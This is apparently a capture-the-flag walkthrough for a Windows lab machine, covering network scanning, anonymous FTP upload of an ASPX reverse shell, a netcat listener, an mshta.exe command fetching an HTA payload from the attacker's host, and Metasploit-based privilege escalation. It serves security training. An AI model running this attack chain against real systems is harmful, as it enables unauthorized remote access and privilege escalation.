Qouted

We will download the machine and configure its network as we did in DC01.

Enumeration:

The first thing we will do is to find the IP of that target machine to proceed, and since its a windows machine we can perform SMB Sweep:

ifconfig

netexec smb 10.0.2.0/24

Now we will run nmap scan:

nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv -Pn 10.0.2.36

As nmap told us that anonymous login is allowed on ftp, lets authenticate to the ftp server:

ftp 10.0.2.36
	anonymous

Lets try if we can upload something to here:

echo "1" > test.txt

And we can upload to the ftp using put command:

put test.txt

As we can see we have write access to this ftp.

Lets try to access the file we uploaded through the browser:

We can access it.

Exploitation:

Lets upload an aspx file to get a reverse shell:

We will use the reverse shell from this website:

https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx

put shell.aspx

Set up a netcat listener and go to this file in the browser:

rlwrap nc -nlvp 443

As we can see it is hanging which means it is waiting for something to be done, which is our shell:

Post-Exploitation:

If we check our privileges:

whoami /priv

We will see that we have SeImpersonatePrivilege, we can use metasploit to escalate our privileges:

search hta_server

Configure the options:

Run it:

exploit

Now lets get a meterepreter shell:

mshta.exe http://10.0.2.35:8080/6vUn5uGTkLnGPc.hta

Lets try to search for exploits:

search suggester

Metasploit shows that there is several attacks we can try to exploit:

And we will use the reflection juicy one:

And here is the root flag, you can find the users flag in the quoted desktop.